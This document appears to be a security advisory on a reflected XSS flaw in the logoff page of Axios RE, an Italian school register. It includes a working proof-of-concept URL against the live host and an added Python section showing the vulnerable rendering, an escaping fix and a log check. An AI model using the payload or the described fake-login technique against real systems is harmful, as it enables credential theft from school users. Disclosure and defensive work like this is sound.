XSS vulnerability in Axios RE - School register

When an error occurs or when the user wants to log out, the RE-Logoff page is called. The page requires two parameters: Error_Desc briefly describes what happened, and Error_Parameters gives extra information about the error, such as an error code. Both URI parameters are embedded directly in the HTML during the request, making the page vulnerable to reflected XSS. An attacker could embed in the URL a form pointing to an external site, or an iframe, crafting a malicious login page to steal credentials.

POC:
https://family.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=[9999]%20Autorizzazione%20Negata%20all%27uso%20della%20Procedura&Error_Parameters=Non%20%C3%A8%20consentito%20l%27accesso%20simultaneo%20da%20%3Csvg/style=%27display:none%27onload=alert(%27xss%27)%3E%3C/svg%3E%20pi%C3%B9%20schede%20del%20browser.%20Si%20prega%20di%20controllare%20se%20esistono%20altre%20finestre%20del%20browser%20aperte%20e%20chiuderle%20prima%20di%20tentare%20di%20accedere%20al%20sistema.
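As an added example that is not part of the advisory or of Axios's own code, the Python below mirrors the flaw using the two reflected parameter names and the POC URL above: a raw concatenation that reproduces the vulnerable behaviour, the HTML-encoded form that removes it while keeping the Italian message intact, and a check a defender can run over logged request URLs to spot reflected markup. The function names and the surrounding `<p>` template are assumptions, not the real RELogOff.aspx markup.

```python
import html
from urllib.parse import urlparse, parse_qs

# Constructed from the proof-of-concept URL quoted in the advisory above.
POC_URL = (
    "https://family.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=[9999]%20Autorizzazione"
    "%20Negata%20all%27uso%20della%20Procedura&Error_Parameters=Non%20%C3%A8%20consentito"
    "%20l%27accesso%20simultaneo%20da%20%3Csvg/style=%27display:none%27onload=alert(%27xss%27)"
    "%3E%3C/svg%3E%20pi%C3%B9%20schede%20del%20browser.%20Si%20prega%20di%20controllare%20se"
    "%20esistono%20altre%20finestre%20del%20browser%20aperte%20e%20chiuderle%20prima%20di"
    "%20tentare%20di%20accedere%20al%20sistema."
)

# The two query parameters the advisory says are reflected into the page.
REFLECTED_PARAMS = ("Error_Desc", "Error_Parameters")


def logoff_params(url):
    """Decode the reflected parameters exactly as the server would see them."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return {p: qs.get(p, [""])[0] for p in REFLECTED_PARAMS}


def render_vulnerable(params):
    """Reproduces the flaw: raw parameter values concatenated into markup (assumed template)."""
    return "<p>%s</p><p>%s</p>" % (params["Error_Desc"], params["Error_Parameters"])


def render_fixed(params):
    """Hardened form: HTML-encode every value before it enters the document.

    html.escape(quote=True) also encodes the apostrophes, so the payload's
    attribute breakout cannot survive even inside a quoted attribute."""
    return "<p>%s</p><p>%s</p>" % (
        html.escape(params["Error_Desc"], quote=True),
        html.escape(params["Error_Parameters"], quote=True),
    )


def is_suspicious(url):
    """Log-review heuristic: a reflected parameter that decodes to HTML markup.

    Legitimate error texts never contain angle brackets, so any request to
    RELogOff.aspx whose Error_Desc/Error_Parameters decode to '<' or '>' is
    worth a closer look."""
    return any("<" in v or ">" in v for v in logoff_params(url).values())
```

Running `is_suspicious` over the RELogOff.aspx entries of a web server access log flags exploitation attempts after the fact; encoding on output is what actually closes the hole.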